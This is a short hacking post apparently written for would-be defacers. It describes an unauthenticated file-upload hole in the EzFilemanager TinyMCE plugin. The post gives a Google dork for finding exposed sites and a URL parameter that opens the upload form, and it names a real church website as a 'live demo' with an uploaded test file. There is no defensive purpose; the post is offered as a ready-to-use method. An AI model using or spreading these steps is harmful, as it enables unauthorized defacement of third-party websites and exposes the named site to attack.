EzFilemanager Deface Upload vulnerability
Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork for getting mor results from Google =)
Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork for getting mor results from Google =)
Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and
put ?sa=1&type=file after URL
now url will be : http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Now
see upload option and upload you file, you can upload ,html ,pdf ,ppt
,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files
Live Demo : http://www.monumentbiblechurch.com/administration/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Result : http://www.monumentbiblechurch.com/mbcphotos/files/aaaaaaaa.txt
! Leave a comment if you enjoyed this post :D
! Leave a comment if you enjoyed this post :D